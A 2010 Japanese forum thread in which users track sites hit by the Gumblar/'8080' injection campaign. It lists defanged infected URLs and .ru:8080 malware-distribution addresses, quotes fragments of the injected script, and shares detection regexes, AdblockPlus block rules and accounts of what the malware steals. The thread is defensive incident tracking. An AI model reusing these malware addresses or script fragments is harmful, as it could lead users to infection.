profile.html Wed, 29 Jul 2009 01:32:48 GMT
0129名無しさん@お腹いっぱい。
2010/05/25(火) 21:59:33言い訳は見苦しいな
0130名無しさん@お腹いっぱい。
2010/05/25(火) 22:12:25ぱそたすさん自演おつです^^^^
そんなことするより早くPCをなおしたほうがいいよ^^^^^
0131名無しさん@お腹いっぱい。
2010/05/25(火) 22:12:330132名無しさん@お腹いっぱい。
2010/05/25(火) 22:21:440133名無しさん@お腹いっぱい。
2010/05/25(火) 22:23:12>>128は自分だけど>>118は違う人
報告されてるのを確認しただけだから探し方は知らん
pasotasuも再改ざんされればわかるだろ
見苦しい抵抗でかわいそうになるな
0134名無しさん@お腹いっぱい。
2010/05/25(火) 22:27:540135名無しさん@お腹いっぱい。
2010/05/25(火) 22:34:180136名無しさん@お腹いっぱい。
2010/05/25(火) 22:34:52感染ページを確認すたのでメルポするを。
0137名無しさん@お腹いっぱい。
2010/05/25(火) 22:38:55でじろにも報告すた。
0138名無しさん@お腹いっぱい。
2010/05/25(火) 22:40:18間違いを素直に認めればいいものを
0139名無しさん@お腹いっぱい。
2010/05/25(火) 22:46:37ttp://online.drweb.com/result?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%70%61%73%6f%74%61%73%75%2e%6e%65%74%2f%6b%6f%75%7a%61%2f%69%6e%64%65%78%2e%68%74%6d%6c
0140名無しさん@お腹いっぱい。
2010/05/25(火) 22:54:110141名無しさん@お腹いっぱい。
2010/05/25(火) 23:06:02呆れたぜ(笑笑笑)
0142名無しさん@お腹いっぱい。
2010/05/25(火) 23:07:340143名無しさん@お腹いっぱい。
2010/05/25(火) 23:12:040144名無しさん@お腹いっぱい。
2010/05/25(火) 23:22:000145名無しさん@お腹いっぱい。
2010/05/25(火) 23:42:24というのが>>141のマニフェストということか
奥が深い
0146名無しさん@お腹いっぱい。
2010/05/26(水) 00:36:28パソコン活用講座でウイルスに感染しようとは
ぱそたすさんはハイレベルおすなあ
0147名無しさん@お腹いっぱい。
2010/05/26(水) 02:26:57とりあえずメル凸しといた
0148名無しさん@お腹いっぱい。
2010/05/26(水) 03:24:19乙、鯖缶とサンスポとmsnにもフォームでつーほーすた。
0149名無しさん@お腹いっぱい。
2010/05/26(水) 04:46:48mamapapaはGoogleのキャッシュに残ってますよ
http://megalodon.jp/2010-0526-0434-07/web-sniffer.net/?url=http://webcache.googleusercontent.com/search?q=cache:jBiCW_fYPi0J:www.mamapapa.net/korean/
ちゃんと改竄告知したほうがプロっぽいですよ
0150名無しさん@お腹いっぱい。
2010/05/26(水) 05:03:06http://megalodon.jp/2010-0525-2213-39/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fwww%2Epasotasu%2Enet%2Fkouza%2Findex%2Ehtml
0151名無しさん@お腹いっぱい。
2010/05/26(水) 07:05:160152↑↑、↑↑↑
2010/05/26(水) 08:03:100153名無しさん@お腹いっぱい。
2010/05/26(水) 08:27:150154名無しさん@お腹いっぱい。
2010/05/26(水) 08:32:230155名無しさん@お腹いっぱい。
2010/05/26(水) 13:59:540156コテハン ◆8080adndqg
2010/05/26(水) 16:13:23www●biz-x●jp
www●wille2●com/
allety●net ←8080 + str="<ijbwjuics src=" + unescape(
www●hawaiianwalker●com/
【本日の目玉商品(違)】
www●n2p●jp/
Web制作、Webデザイン、システム開発・・
0157名無しさん@お腹いっぱい。
2010/05/26(水) 16:18:210158名無しさん@お腹いっぱい。
2010/05/26(水) 16:21:39???
0159コテハン ◆8080adndqg
2010/05/26(水) 16:25:12www●n2p●jp/には、最下部の8080と・・・
<body id="n2p.jp" class="topBody">
<script type='text/javascript'>str="<ijbwjuics src=" + unescape(・・・
2系統が装填されておりますw
更に・・・
webcache●googleusercontent●com/search?q=cache:UROQ0WRKXtQJ:www●n2p●jp/
ijbwjuics src= → ない
8080 → 装填済
0160名無しさん@お腹いっぱい。
2010/05/26(水) 16:30:430161名無しさん@お腹いっぱい。
2010/05/26(水) 16:37:34???
0162名無しさん@お腹いっぱい。
2010/05/26(水) 17:31:12それを放置したままというのがありえない
まさか管理者は改ざんされたことを知らずにサイトの更新だけしているのか?
0163名無しさん@お腹いっぱい。
2010/05/26(水) 17:52:14ttp://jsunpack.jeek.org/dec/go?report=008baa3edce14258adb5e906fc5e9e8eb500897b
0164名無しさん@お腹いっぱい。
2010/05/26(水) 18:07:440165名無しさん@お腹いっぱい。
2010/05/26(水) 20:10:22サンスポ本体もまずい?
0166名無しさん@お腹いっぱい。
2010/05/26(水) 20:31:46Flashクッキーってみんなどうしてる?
一応、今は切ってるんだけど
必要な際いちいち入れるの面倒でちょっと迷ってたり……
Flashクッキーが悪用される例とかってどのくらいあるん?
0167名無しさん@お腹いっぱい。
2010/05/26(水) 20:34:27アホは考えるだけ無駄
0168名無しさん@お腹いっぱい。
2010/05/26(水) 20:36:120169名無しさん@お腹いっぱい。
2010/05/26(水) 21:05:18そりゃおめーだろ
0170名無しさん@お腹いっぱい。
2010/05/26(水) 21:36:00Web改竄ウイルスには感染しないの?
0171名無しさん@お腹いっぱい。
2010/05/26(水) 21:47:06自分の脳みそもうpだてしとけば?
0172名無しさん@お腹いっぱい。
2010/05/26(水) 22:14:240173名無しさん@お腹いっぱい。
2010/05/26(水) 22:20:130174名無しさん@お腹いっぱい。
2010/05/26(水) 22:23:000175名無しさん@お腹いっぱい。
2010/05/26(水) 22:24:06そもそもネタスレなのかも知れねーけどw
0176名無しさん@お腹いっぱい。
2010/05/26(水) 22:25:490177名無しさん@お腹いっぱい。
2010/05/26(水) 22:42:28俺はアンインストールしてから
やったらきえた
0178名無しさん@お腹いっぱい。
2010/05/26(水) 22:43:55CCクリーナーで簡単に管理できるよ
おれっちは全部拒否
0179名無しさん@お腹いっぱい。
2010/05/26(水) 23:13:31オプション>クッキーリストまでは辿りついたけど
操作(拒否?削除?)が分かんないっす・・・
0180名無しさん@お腹いっぱい。
2010/05/26(水) 23:25:350181名無しさん@お腹いっぱい。
2010/05/26(水) 23:28:540182名無しさん@お腹いっぱい。
2010/05/26(水) 23:33:06Flashのは違うのか
0183名無しさん@お腹いっぱい。
2010/05/26(水) 23:34:00人それぞれ
0184名無しさん@お腹いっぱい。
2010/05/26(水) 23:36:410185名無しさん@お腹いっぱい。
2010/05/26(水) 23:48:560186名無しさん@お腹いっぱい。
2010/05/26(水) 23:52:25以上のことはおまじないレベルだから好きにしろ
0187名無しさん@お腹いっぱい。
2010/05/26(水) 23:58:45使ってないんじゃなくてアンインストールしないとだめ
0188名無しさん@お腹いっぱい。
2010/05/27(木) 00:05:24保持したいクッキーのurlを右側の欄にドラッグ&ドロップ
拒否したい場合はなにもしなくてもOK
つまりCCクリーナーインストールした時点でクッキーは全部はじかれる
0189名無しさん@お腹いっぱい。
2010/05/27(木) 00:07:350190名無しさん@お腹いっぱい。
2010/05/27(木) 00:21:14http://www.itmedia.co.jp/news/articles/0908/13/news017.html
0191名無しさん@お腹いっぱい。
2010/05/27(木) 00:52:290192名無しさん@お腹いっぱい。
2010/05/27(木) 01:46:35ありがとう。こういうものの存在すら知らなかった…
0193名無しさん@お腹いっぱい。
2010/05/27(木) 02:17:220194名無しさん@お腹いっぱい。
2010/05/27(木) 08:02:52あるよ。
以上。
はい次の方。
0195名無しさん@お腹いっぱい。
2010/05/27(木) 09:05:17いばりやがって
0196名無しさん@お腹いっぱい。
2010/05/27(木) 10:06:42再発?orあれからまだ気づいてない?
aguseで反応
wangnin●com/about/index●html
0197名無しさん@お腹いっぱい。
2010/05/27(木) 10:17:21このスレ見てると頼ってる人が多いみたいだけど、、、
gredは反応示すことがほとんどない
どっちが正しいのかは知らんけど
0198名無しさん@お腹いっぱい。
2010/05/27(木) 10:44:34Danさんのでソース詳しく見てみればいいよ
0199名無しさん@お腹いっぱい。
2010/05/27(木) 13:31:54tenthprofit■ru:8080/google.com/comdirect.de/macys.com.php
典型的な8080さんですね。ケツに謎のMD5ハッシュが付くのも特徴的。
0200名無しさん@お腹いっぱい。
2010/05/27(木) 13:58:06www●barakai●com
0201名無しさん@お腹いっぱい。
2010/05/27(木) 14:28:15このスレ住人はソース直接見るからgredなんて頼ってないよ
お客さん向けに目安として示してるだけだよ
0202名無しさん@お腹いっぱい。
2010/05/27(木) 14:30:03放置されてるだけだね
Last-Modified: Thu, 20 May 2010 02:53:32 GMT
0203名無しさん@お腹いっぱい。
2010/05/27(木) 16:41:39PC初心者にはGENO系Gumbler系のスレが無いからねぇ
ここに縋るしかない
まぁだからってここに書いてあるURLじゃないから大丈夫とは絶対限らないんだけど
>>3>>4こなせば現状では万が一感染ページ踏んでも大丈夫だから怖がりすぎる必要は無い……筈
0204名無しさん@お腹いっぱい。
2010/05/27(木) 18:17:26pc-telcom●com
※population-japan●com関連
0205名無しさん@お腹いっぱい。
2010/05/27(木) 18:17:57使えるねっとに問い合わせたら、こちらでは対処しかねるそうで
レンタルサーバーは安全、信頼の使えるねっとwwwww
0206名無しさん@お腹いっぱい。
2010/05/27(木) 18:33:05ウィルスバスター2010が反応してmal gumblarを
@検出、駆除できず
A隔離できずと表示されました
こんなこと初めてです。どうすればいいのでしょう?
0207名無しさん@お腹いっぱい。
2010/05/27(木) 18:35:54OSは
プラグインは?
ActiveXやJavaScript等の設定は?
0208名無しさん@お腹いっぱい。
2010/05/27(木) 19:22:48なるほど
いろいろ事情がわかるコメでした
0209名無しさん@お腹いっぱい。
2010/05/27(木) 19:41:49メル凸しときました
>>205
数日前にallety●netが陥落してたんで、つかえるネットにメル凸したら
「報告感謝、サービス停止したから確認して」って内容の返信がきたよ?
0210名無しさん@お腹いっぱい。
2010/05/27(木) 21:18:20結果: 4/41 (9.76%)
width、height、length、style…樹を隠すには森の中ですか
>>200
>>205
「ご連絡いただきましたサイトにつきましては、弊社でも確認し
不正なスクリプトを確認させて頂きましたので、取り急ぎ
サービスの停止を行わせていただきました。」
との事
0211名無しさん@お腹いっぱい。
2010/05/27(木) 21:32:27設置してないWordPressやらAWstatsを探そうとクロールしてるホストがあった
80番ポートが空いてたので、Dan's View Sourceで確認したら案の定「.ru:8080」があった
こういうのってボットネットワークのゾンビなのかねぇ?
0212名無しさん@お腹いっぱい。
2010/05/27(木) 21:34:06サイトは停止してないし
Gumblar判定もまだでるけど?
0214名無しさん@お腹いっぱい。
2010/05/27(木) 22:49:28ふたりともリロード汁
制作会社のページに転送されるだろ?
0215名無しさん@お腹いっぱい。
2010/05/27(木) 22:50:15おまじない程度っていうひとがいるね
どっちがほんとなのかは謎といったところか
0216名無しさん@お腹いっぱい。
2010/05/27(木) 22:50:59aguse側のDNS更新されてなさそう
0217名無しさん@お腹いっぱい。
2010/05/27(木) 22:52:59糞レスしてふたりともごめん
0218名無しさん@お腹いっぱい。
2010/05/27(木) 22:53:05スクリプト全切とかをおまじない程度っていってんだよ
0219名無しさん@お腹いっぱい。
2010/05/27(木) 22:54:47http://www●barakai●com/
http://barakai●com/
止まってる。
0220名無しさん@お腹いっぱい。
2010/05/27(木) 22:56:49なるほど
わかりました
0221名無しさん@お腹いっぱい。
2010/05/27(木) 23:06:38scriptタグ後にハッシュ値がきたら警告するようにしてます
$NEST(<script,\1</script>)\s<!--[0-9a-f]+{32}--> にマッチで置換
0222名無しさん@お腹いっぱい。
2010/05/28(金) 01:55:03ttp://www.tanteifile.com/newswatch/2010/05/27_01/image/04.jpg
0223名無しさん@お腹いっぱい。
2010/05/28(金) 07:40:26忘れていた意外な情報を得る
0224名無しさん@お腹いっぱい。
2010/05/28(金) 10:26:57www●adwalk●co●jp
そういえば、とある議員のホームページも改ざんされてたな
0225名無しさん@お腹いっぱい。
2010/05/28(金) 12:23:43http://www.hds-x●com/
0226名無しさん@お腹いっぱい。
2010/05/28(金) 12:37:09http://canyonhardware◎com/
http://otokudou◎h01◎jp/
http://www◎borneomarathon◎com/jpn/home◎html
http://www◎jyoho-review◎jp/item_list/
http://www◎spalodge◎co◎nz/
http://www◎ryu1◎co◎jp/
http://minatomo◎jp/
http://sartur◎com/
http://lavishad◎com/
http://hampson-scott◎com/
http://www◎ondeugendstel◎com/web/media2/index◎php?option=com_rss&feed=RSS2◎0&no_html=1
さて、エンジェルビーツ始まるまで寝るか…。重複チェックしてないお(`・ω・´)
0227名無しさん@お腹いっぱい。
2010/05/28(金) 12:46:5214時間も寝るのかよw
取扱注意
www●wood-sadoh●co●jp/classroom/index.html
TOPはまだ改ざんされてなかったけど、時間の問題だな
0228名無しさん@お腹いっぱい。
2010/05/28(金) 13:41:59チェックしてゼロデイの傾向と対策を、、、
ってもう、まんべんなくだなw
0229名無しさん@お腹いっぱい。
2010/05/28(金) 14:00:49管理者のセキュリティ意識が無いサイトがやられてるだけ
サイトの内容は無関係
0230コテハン ◆8080adndqg
2010/05/28(金) 14:47:51www●biz-x●jp
www●i-keiei●jp/
www●w-ouen●com/league/index●html ←早稲田大学応援部
cowgirl●jp/
↓
<script type='text/javascript'>str="<ijbwjuics src=・・・
<script>try {var Qv='QN'} catch(Qv){};var・・・
<!--改竄されたので絶賛放置中!-->
※アクセス注意!※
www●aquaview●jp
↓
www●aquaview●jp/m_shop/index●html
↓
webcache●googleusercontent●com/search?q=cache:9SfGiGAU864J:www●geocities●jp/kic_aquaview/order●html
※消滅してたので、キャッシュから・・
0231名無しさん@お腹いっぱい。
2010/05/28(金) 15:19:23よいところにいらっしゃった
><script type='text/javascript'>str="<ijbwjuics src=・・・
これ、どうやって拾ったらいい?
色々試してるんだけどどうにもうまくいかない
0232名無しさん@お腹いっぱい。
2010/05/28(金) 16:15:27www●garden-bank●com
0233名無しさん@お腹いっぱい。
2010/05/28(金) 16:34:21www●w-ouen●com/league
cowgirl●jp
www●garden-bank●com
メル凸済み、反応待ち
0234名無しさん@お腹いっぱい。
2010/05/28(金) 17:44:54www●i-keiei●jp
なにもないが、メル凸済みだからか?
0235名無しさん@お腹いっぱい。
2010/05/28(金) 17:51:050236コテハン ◆8080adndqg
2010/05/28(金) 18:00:29"vxoq3" "xaoz3" ←センセイ向け
"ijbwjuics" "str.replace(" ←禿向け
現時点ではほとんど釣れないみたい・・・
8080系の陥落サイトに寄生してるから、ソースを見る時
<body>の後側も見ておくと良いかも
0237226 ◆4SB9WSR5xY
2010/05/28(金) 18:02:14http://cocoro-dhp◎sakura◎ne◎jp/
0238コテハン ◆8080adndqg
2010/05/28(金) 18:08:21センセイの記憶を覗いてみにゃ
webcache●googleusercontent●com/search?q=cache:RW9_Hzfo7hMJ:www●i-keiei●jp/
http://18tubeporn◎com/
http://extratube◎cn/
http://aimauto◎org/
http://laschuwi◎com/
http://kopolinos◎com/
http://mature-lessons-porn◎com/
http://ayume◎eu/
http://flowertask◎co◎jp/
http://wovens◎info/
http://mb3z◎jp/
http://lets-you◎jp/
http://hohoemi-link◎lovepop◎jp/
0240名無しさん@お腹いっぱい。
2010/05/28(金) 18:29:39おまえは何をやってるんだ?
http://saicho◎co◎jp/
http://mag◎rdy◎jp/
http://jamur◎jp/
http://truth-co◎jp/
http://yamana◎sakura◎ne◎jp/
http://minatomo◎jp/
http://s1◎shard◎jp/syozyonudo/
http://makino-fudousan◎co◎jp/
http://kimihiro◎sakura◎ne◎jp/
http://situgyou◎bufsiz◎jp/
http://babylovers◎jp/
新しい方法試してみたけど、誤爆率高いorz
とりあえず.jpだけ。
クソコテ氏ねですね。
ごめんなさい。
0243名無しさん@お腹いっぱい。
2010/05/28(金) 18:39:300244名無しさん@お腹いっぱい。
2010/05/28(金) 18:56:08Gredで覗いてみて
>>235
乙です
>>236
ご教授感謝、無理を申しました
頑張ってみます
0245名無しさん@お腹いっぱい。
2010/05/28(金) 22:25:37そんなことあるんだ
0246名無しさん@お腹いっぱい。
2010/05/28(金) 22:32:41少々亀レスですみませんが
たとえばどのようなコードや文字列に注意すればいいのでしょうか
0247名無しさん@お腹いっぱい。
2010/05/28(金) 22:34:110248名無しさん@お腹いっぱい。
2010/05/28(金) 22:41:570249名無しさん@お腹いっぱい。
2010/05/28(金) 22:44:57マルチはやめようね
0251名無しさん@お腹いっぱい。
2010/05/29(土) 00:10:13ここは鑑定スレじゃないから
↓こっちで聞け↓
勇気がなくて踏めないURL鑑定スレin初質 Part41
http://gimpo.2ch.net/test/read.cgi/qa/1274878983/
0252名無しさん@お腹いっぱい。
2010/05/29(土) 00:36:59>>3の設定に直してスキャンしてみましたけど何も出なかったです…
0253名無しさん@お腹いっぱい。
2010/05/29(土) 00:41:40スペックかけよ
OS,ブラウザ,Adobe ReaderのVer,対策ソフト
0254名無しさん@お腹いっぱい。
2010/05/29(土) 00:49:51踏んでから>>3の設定に直しても意味ないぞw
つか、アンチウイルスソフトは反応しなかったのか?
踏んだ時の症状を教えてくれ。
0256名無しさん@お腹いっぱい。
2010/05/29(土) 00:55:26ありがとうございます
【OS】XP pro SP3
【ブラウザ】Internet Explorer 8(タブブラウザのDonut RAPTっての使ってます)
【Microsoft Updateの更新の状態】最新でした
【セキュリティソフトと年式】ノートンインターネットセキュリティ 2009
【回線の種類・ルータの有無】光回線でルータ使用中
【Adobe ReaderのVer】最新でした
Donut RAPT使ってる時はノートンの保護機能?は働かないみたいです
今は自宅のPCからでこれぐらいしか覚えてなくて申し訳ないです
0257名無しさん@お腹いっぱい。
2010/05/29(土) 00:56:41大丈夫、数日前に対策されとる
>>99にも書かれとる
しかしテンプレに罠仕込むなんてこのスレどうしちまったんだ
0258名無しさん@お腹いっぱい。
2010/05/29(土) 00:57:04いえ会社はサイト持ってないです
孫請けの零細ですので
0259名無しさん@お腹いっぱい。
2010/05/29(土) 01:06:440261名無しさん@お腹いっぱい。
2010/05/29(土) 01:15:55AdobeReaderは最新じゃなくバージョンをきちんと確認しろ
JavaとFlashPlayerもね
0263256
2010/05/29(土) 01:23:38連投すいません
>3の更新確認でそれら全て更新チェックして全て最初から最新だったと記憶してます。
後、図に乗った質問で申し訳ないんですけど、このウイルスはどういった悪さをするんでしょう?
0264名無しさん@お腹いっぱい。
2010/05/29(土) 01:24:43ノートンなら以下のクラウド型と併用可だからしてみては?
【併用可】gred AntiVirusアクセラレータ part2
http://pc11.2ch.net/test/read.cgi/sec/1268032521/
0266名無しさん@お腹いっぱい。
2010/05/29(土) 01:26:56どっちみち感染したらFTP含めてWebサービスすべてのIDパスはとられる
自分だけでなくLAN内すべて
あとは偽セキュリティソフトのインストール、特定サイトへの攻撃、
BOT機能のインストールなどいろいろ
0267名無しさん@お腹いっぱい。
2010/05/29(土) 01:35:43これは今後のセキュリティですね
ありがとうございます。あとで確認してみます
>>266
そうですか…
そうなってくると自分にはもうお手上げですねorz
0268253
2010/05/29(土) 01:40:55そろそろスレチだが、
>>ノートンインターネットセキュリティ 2009
もしまだライセンス残ってるなら、2010にタダでバージョンうpできるからやっとけ。
http://updatecenter.norton.com/?NUCLANG=ja
0269名無しさん@お腹いっぱい。
2010/05/29(土) 01:52:21荒らしの仕業だろ
0270名無しさん@お腹いっぱい。
2010/05/29(土) 01:58:01>>16-19
0272名無しさん@お腹いっぱい。
2010/05/29(土) 03:42:02鑑定スレに貼ってたな
0273名無しさん@お腹いっぱい。
2010/05/29(土) 12:07:41ウィルスに感染したのに告知無しで復旧
こういうところの会員も同じ穴の狢でモラルもないんだろうな。
0274名無しさん@お腹いっぱい。
2010/05/29(土) 12:11:41うさんくせー
0275名無しさん@お腹いっぱい。
2010/05/29(土) 12:24:590276名無しさん@お腹いっぱい。
2010/05/29(土) 13:33:38http://online.us.drweb.com/result/?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%69%2d%6b%65%69%65%69%2e%6a%70%2f%61%72%63%68%69%76%65%73%2f%63%61%74%31%2f%69%6e%64%65%78%2e%68%74%6d%6c
0277名無しさん@お腹いっぱい。
2010/05/29(土) 13:59:43だが
ttp://www.zarathustra-wins.net/のサイトにある
ガンブラー対策のページだな
そこがやられたらしい
272のURLでググるとガンブラー質問系のサイトに結構貼られてるが罠か?
0278名無しさん@お腹いっぱい。
2010/05/29(土) 16:07:57改竄の件は把握していない模様
ttp://www.aguse.jp/?m=w&url=www.i-keiei.jp&x=43&y=16
↑の076-234-5554あいびーらぼ?がHPを作っていると認めました
>あいびーらぼ?さん
折り返しの電話ありませんねw
自分達のスキルに自信があるのでしょうね
このスレの情報以外の所も改竄されている様ですが、見つけられるかなw
0279名無しさん@お腹いっぱい。
2010/05/29(土) 16:24:15www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
0280オルティス・ジャパン
2010/05/29(土) 16:57:52www●itofound●or●jp
ここはガンブラーによって改竄されていると話すと電話を切る
更に電話をすると無言攻撃をする非礼極まりない所
対応は停止する
0281名無しさん@お腹いっぱい。
2010/05/29(土) 17:00:24CSJスポーツのサイト!?
0282名無しさん@お腹いっぱい。
2010/05/29(土) 17:09:480283名無しさん@お腹いっぱい。
2010/05/29(土) 17:21:500284名無しさん@お腹いっぱい。
2010/05/29(土) 17:26:44VistaのマシンなんだがSP2すら当たっていなかったので心配だった。
普段は車に積んで移動してるので、なかなかメンテナンスの機会がなくて
たまにEモバなんかでネットに繋いだりするもんだからヒヤヒヤもので...
0285名無しさん@お腹いっぱい。
2010/05/29(土) 17:54:32www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
メル凸済み、反応待ち
>>280
一応、so-netとJPCERT/CCにも通報してあります
コレでダメなら別の手を考えますよ…
>>281
ジェイスポーツは「www●jsports●co●jp」
感染してるのは「横浜市・川崎市サッカークラブ」です
0286名無しさん@お腹いっぱい。
2010/05/29(土) 18:16:19個人ならまだわかる、でも法人が平然とやってのける
マジであきれる
0287コテハン ◆8080adndqg
2010/05/29(土) 18:16:44fps01●plala●or●jp/~zeiken/
www●marbell●jp/img2/photo/tenonaru/index●html
www●pflaster●co●jp/contact/
0288コテハン ◆8080adndqg
2010/05/29(土) 18:34:54穴があるかもしれないPCには
Firefox+NoScript+AdblockPlus+RequestPolicy
この組み合わせを推奨する。
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|http://*:8080/* をブロック
0289名無しさん@お腹いっぱい。
2010/05/29(土) 19:02:18レスありがとう
自宅のPCのデフォはFirefoxなんだが、車に積んでるのは
なにぶん初心者向け講習会用なので、困ったことにデフォは
IEなんだなこれが。
0290名無しさん@お腹いっぱい。
2010/05/29(土) 19:03:07JavascriptはどうしてもONにすることがあると思う、その時にスキャンできず素通りしてしまってる
0291名無しさん@お腹いっぱい。
2010/05/29(土) 19:06:180292名無しさん@お腹いっぱい。
2010/05/29(土) 19:15:080293名無しさん@お腹いっぱい。
2010/05/29(土) 19:50:200294名無しさん@お腹いっぱい。
2010/05/29(土) 20:16:12とりあえずIE8にしておけばいいとおもうよ
もしくはGoogleChrome
わりと初心者にもすんなり受け入れられる
初心者はそもそもIEでも慣れてるわけじゃないから実はなんでもいいのだ
0295名無しさん@お腹いっぱい。
2010/05/29(土) 20:42:23メル凸済み、pflasterにはメール届かず、その他は反応待ち
>>291
メル凸済み、反応待ち
0296名無しさん@お腹いっぱい。
2010/05/29(土) 21:10:09ゼロDay食わない限りそうそう怖いことなかろうて
0297名無しさん@お腹いっぱい。
2010/05/29(土) 21:45:3715:50着、かすぺ対応とのこと、持ってる人は確認お願いぽ。
> Trojan-Downloader.JS.Pegel.av
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>>278
乙乙。
鯖缶につーほーしておいてた返事、担当に伝えるとのこと。
0299297
2010/05/29(土) 21:54:200300名無しさん@お腹いっぱい。
2010/05/29(土) 21:55:55おいおいそれってスカパーとかCATVのスポーツかよ?
0301名無しさん@お腹いっぱい。
2010/05/29(土) 21:57:04駆除すらされずメル凸するまで放置ということもあるけど
まさか毎日ページを見ている管理人が改竄に気づいてないというパターンなのかな?
0302名無しさん@お腹いっぱい。
2010/05/29(土) 21:58:17CSのJスポーツはwww●jsports●co●jp
0303284
2010/05/29(土) 22:19:30つまりその、テキストと画面のデザインがほんのちょっとでも異なると
講習生がとまどうからという理由で。
0304名無しさん@お腹いっぱい。
2010/05/29(土) 22:23:21とまどうのは(柔軟性の無い)おしえているほうだにゃ。
互換性表示ってのあるのに…
0305304
2010/05/29(土) 22:25:56買い換えろ!
つか実施で説明できない人が教えてんのか。
0306名無しさん@お腹いっぱい。
2010/05/29(土) 22:33:110307名無しさん@お腹いっぱい。
2010/05/29(土) 22:38:48今後のことを考えても全く一緒なことはありえないから
画面は多少変わることもあることを口頭で良いから教えるべきだとは思う
家にあるPCがテキストと違うと使えないってことになるだろ
まあ車と違ってコロコロUI変えちゃってる方にも問題はあるんだけども
0309名無しさん@お腹いっぱい。
2010/05/29(土) 23:20:510310名無しさん@お腹いっぱい。
2010/05/29(土) 23:25:090311名無しさん@お腹いっぱい。
2010/05/29(土) 23:32:330312284
2010/05/30(日) 00:11:00なにぶん、講習生はお年寄りが対象なので、幹部連中は...
「セキュリティに関してはあまり教え過ぎるとせっかくのやる気をそぐし、
してはいけないことだらけでつまらなくて結局身に付かない」
...ということで、WindowsUpdateを教えることさえあまり乗り気ではないのですよ。
それに、件のパソコンは、長い時にはひと月に一日使うか使わないかっ
ていう利用頻度なもので、ネットにもあまり繋がないのでセキュリティ
アップデートかけるチャンスもなかなかないんです。
それでいていざ講習会が始まると、週一でネットには繋ぐけど
講習の準備と撤収作業が忙しくてアップデートどころじゃなくなっちゃうんで
かえって危ないです。
0313あんちたった ◆MOTO.0SDfQ
2010/05/30(日) 00:59:430314名無しさん@お腹いっぱい。
2010/05/30(日) 01:28:400315名無しさん@お腹いっぱい。
2010/05/30(日) 01:38:32ヤフー懸賞経由で応募しようとリンク踏んだらノートン先生の警告でた。
さらに、aguseで、「Gumblarの可能性あり」と出てたから、ヤフーと懸賞主催者に伝えたけど、両者から感染してないわボケと言われたけど、感染してるよね?
0316名無しさん@お腹いっぱい。
2010/05/30(日) 01:46:20site.jsとかやられてるっち。
0317あんちたった ◆MOTO.0SDfQ
2010/05/30(日) 02:19:47もしかしてHTMLしかみてないの?
0318名無しさん@お腹いっぱい。
2010/05/30(日) 02:40:220319名無しさん@お腹いっぱい。
2010/05/30(日) 02:41:35これどこにあるの?
0321名無しさん@お腹いっぱい。
2010/05/30(日) 03:17:08ボケまで言わないだろw
また電話して録音してみれば?
http://jsunpack.jeek.org/dec/go?report=7130e159282202ef242480c9a65e9a67430adf2f
0322316
2010/05/30(日) 03:42:15鯖缶にもフォームから戸津
やほにもフォームから戸津
ついでにめるぽ
>>315が事実なら由々しき事態。
っと言いたいけど、jsファイルのみの感染の場合(ほかにもあるかもしんないけどー)
結構見逃されがちでこちらから指摘しないと対応されないぽ。。。
0323316
2010/05/30(日) 04:42:53かすぺは既に対応済みのこと。
> - HEUR:Trojan-Downloader.Script.Generic
> This files are already detected. Please update your bases.
VTのタイムラグか。。。orz......
ごめんよ、ひげおぢさん。
0324315
2010/05/30(日) 08:32:37ごめん。ボケとまでは言われてないです。
ヤフーは、担当者に報告し検証した後、対処すると言われて2週間過ぎましたが、未だに応募可能たし、ウイルス感染無しと判断したんだなと。
懸賞主催者は、調べましたが、ウイルスに感染してません。ウイルスが蔓延してますので、チェックを2重にして気をつけると言われました。
なので、もう、シラネと思ってましたが、このスレ見て一応、このスレを読んでる人だけには報告しておこうと書き込みました。
0325名無しさん@お腹いっぱい。
2010/05/30(日) 09:48:17対応はいいホスティング会社なので、それらばもう止まってたかも
0326名無しさん@お腹いっぱい。
2010/05/30(日) 10:10:35ttp://www●cheesecake●co●jp/user_data/packages/org/js/site●js
0327名無しさん@お腹いっぱい。
2010/05/30(日) 10:22:28これ、感染が結構古くない? Wepawetに投げてみたけど、こういう結果だった。
http://wepawet.iseclab.org/view.php?hash=d048d4b80057b854928823d9ef22c31f&t=1275179400&type=js
確かに感染しているんだけど、既に8080のマルウェア配布先が死んでる。(※)
なんで、悪意のある、感染させる方としてはとっくにyahooは用済み状態。
これ、yahooの感染〜マルウェア配布鯖停止まで気がつかれなかったとしたら、かなりヤバイ。
(※) Wepawerの解析結果で、Requestsの所の、http://gothguilt●ru:8080/google●com/espn●go●com/qip●ru●php
がマルウェアの配布元。 ここにアクセスに行くんだけど、既にStatus = Errorの通り、何も起きない。
私の方もVirtualPC使って無防備で踏んでみたけど、“今は” やっぱり何も落ちてこなかった。 現状無害だけど、どれだけ被害出たんだろう...orz
0328327
2010/05/30(日) 10:28:32ちなみに、site.jsのVT結果。誰かが最近投げたばかりなので、そのまま引用。
http://www.virustotal.com/jp/analisis/d3698d3fca4c319a19346e9451a437b99a4354533d8020dc559c28e686a2717b-1275156778
現時点でも検出 5/41とか...終わったねぇ。orz NortonとKasperskyはヒューリスティックで検出するみたいだけど、その他はどうなっている事やら。
0329327
2010/05/30(日) 10:33:37あ、スマン。Yahooが感染していたんじゃなくて、Yahooの懸賞の所に、感染したサイトがリンクされてたのか。
感染していたのは cheesecake●co●jp の方ですね。スミマセン
0330名無しさん@お腹いっぱい。
2010/05/30(日) 10:47:56[Trend Micro Security Blog]から引用
http://blog.trendmicro.co.jp/archives/3340
>3 不正スクリプトによる不正サイトへの接続は、同じIPアドレスからは初回接続時(または初回接続後のわずかな時間)しか本来の(不正な)応答がされない。
=>マルウェアサンプルの入手が困難になる。
IPアドレス以外に時間などで制御する可能性もありますし、まだ有害かもしれません
0331名無しさん@お腹いっぱい。
2010/05/30(日) 11:21:03有限会社みのりや
www●minoriya●co●jp/result/
ここが大丈夫ですって言っているのでしょうね
0332名無しさん@お腹いっぱい。
2010/05/30(日) 11:21:49user_data/packages/org/js/css.js infected with JS.Redirector.based.3
user_data/packages/org/js/navi.js infected with JS.Redirector.based.3
user_data/packages/org/js/win_op.js infected with JS.Redirector.based.3
user_data/packages/org/js/itembox.js infected with JS.Redirector.based.3
